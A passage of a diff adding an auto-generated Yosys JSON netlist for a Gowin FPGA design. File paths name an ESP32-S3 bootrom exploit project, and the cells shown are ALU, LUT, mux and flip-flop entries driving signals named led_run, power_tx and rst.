"c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 221 ], + "COUT": [ 219 ], + "I0": [ 28 ], + "I1": [ 73 ], + "I3": [ 27 ], + "SUM": [ 222 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 223 ], + "COUT": [ 221 ], + "I0": [ 27 ], + "I1": [ 76 ], + "I3": [ 27 ], + "SUM": [ 224 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 225 ], + "COUT": [ 223 ], + "I0": [ 27 ], + "I1": [ 83 ], + "I3": [ 27 ], + "SUM": [ 226 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 227 ], + "COUT": [ 225 ], + "I0": [ 28 ], + "I1": [ 86 ], + "I3": [ 27 ], + "SUM": [ 228 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 229 ], + "COUT": [ 227 ], + "I0": [ 27 ], + "I1": [ 89 ], + "I3": [ 27 ], + "SUM": [ 230 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 28 ], + "COUT": [ 229 ], + "I0": [ 27 ], + "I1": [ 91 ], + "I3": [ 27 ], + "SUM": [ 231 ] + } + }, + "led_run_LUT3_I0": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "10000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 232 ], + "I0": [ 138 ], + "I1": [ 42 ], + "I2": [ 233 ] + } + }, + "led_run_LUT3_I0_F_MUX2_LUT5_I0": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 232 ], + "I1": [ 234 ], + "O": [ 119 ], + "S0": [ 235 ] + } + }, + "led_run_LUT4_I0": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1100100010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 116 ], + "I0": [ 138 ], + "I1": [ 42 ], + "I2": [ 236 ], + "I3": [ 235 ] + } + }, + "led_run_LUT4_I0_1": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1100100011000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 234 ], + "I0": [ 138 ], + "I1": [ 42 ], + "I2": [ 236 ], + "I3": [ 233 ] + } + }, + "power_tx_OBUF_O": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 237 ], + "O": [ 4 ] + } + }, + "power_tx_reg_DFFS_Q": { + "hide_name": 0, + "type": "DFFS", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:55.7-55.57" + }, + "port_directions": { + "CLK": "input", + "D": "input", + "Q": "output", + "SET": "input" + }, + "connections": { + "CLK": [ 13 ], + "D": [ 238 ], + "Q": [ 237 ], + "SET": [ 27 ] + } + }, + "power_tx_reg_DFFS_Q_D_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 239 ], + "I1": [ 240 ], + "O": [ 238 ], + "S0": [ 141 ] + } + }, + "power_tx_reg_LUT3_I2": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11110100" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 239 ], + "I0": [ 241 ], + "I1": [ 242 ], + "I2": [ 237 ] + } + }, + "power_tx_reg_LUT4_I2": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000011110100" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 240 ], + "I0": [ 241 ], + "I1": [ 242 ], + "I2": [ 237 ], + "I3": [ 236 ] + } + }, + "rst_DFF_Q": { + "hide_name": 0, + "type": "DFF", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:13.6-13.47" + }, + "port_directions": { + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CLK": [ 13 ], + "D": [ 243 ], + "Q": [ 241 ] + } + }, + "rst_DFF_Q_1": { + "hide_name": 0, + "type": "DFF", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:13.6-13.47" + }, + "port_directions": { + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CLK": [ 13 ], + "D": [ 244 ], + "Q": [ 242 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 245 ], + "I1": [ 246 ], + "O": [ 244 ], + "S0": [ 141 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 247 ], + "I1": [ 248 ], + "O": [ 245 ], + "S0": [ 235 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "1000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input" + }, + "connections": { + "F": [ 247 ], + "I0": [ 241 ], + "I1": [ 242 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1111100010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 248 ], + "I0": [ 241 ], + "I1": [ 242 ], + "I2": [ 42 ], + "I3": [ 236 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 249 ], + "I1": [ 250 ], + "O": [ 246 ], + "S0": [ 235 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11111000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 249 ], + "I0": [ 241 ], + "I1": [ 242 ], + "I2": [ 236 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11111000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 250 ], + "I0": [ 241 ], + "I1": [ 242 ], + "I2": [ 236 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 251 ], + "I1": [ 252 ], + "O": [ 243 ], + "S0": [ 141 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 253 ], + "I1": [ 254 ], + "O": [ 251 ], + "S0": [ 235 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "10" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 253 ], + "I0": [ 241 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1000101010101010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 254 ], + "I0": [ 241 ], + "I1": [ 255 ], + "I2": [ 256 ], + "I3": [ 236 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 257 ], + "I1": [ 258 ], + "O": [ 252 ], + "S0": [ 235 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input" + }, + "connections": { + "F": [ 257 ], + "I0": [ 241 ], + "I1": [ 236 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input" + }, + "connections": { + "F": [ 258 ], + "I0": [ 241 ], + "I1": [ 236 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 259 ], + "I1": [ 260 ], + "O": [ 141 ], + "S0": [ 261 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 259 ], + "I0": [ 27 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0001000000000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 260 ], + "I0": [ 111 ], + "I1": [ 114 ], + "I2": [ 262 ], + "I3": [ 263 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O": { + "hide_name": 0, + "type": "MUX2_LUT7", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:166.14-166.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 264 ], + "I1": [ 265 ], + "O": [ 261 ], + "S0": [ 91 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 266 ], + "I1": [ 267 ], + "O": [ 264 ], + "S0": [ 89 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 268 ], + "I1": [ 269 ], + "O": [ 266 ], + "S0": [ 86 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 268 ], + "I0": [ 27 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000001000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input", + "I3": "input" + }, + "connections": { + "F": [ 269 ], + "I0": [ 67 ], + "I1": [ 70 ], + "I2": [ 73 ], + "I3": [ 76 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54" + }, + "port_directions": { + "I0": "input", + "I1": "input", + "O": "output", + "S0": "input" + }, + "connections": { + "I0": [ 270 ], + "I1": [ 271 ], + "O": [ 267 ], + "S0": [ 86 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 270 ], + "I0": [ 27 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "00" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": 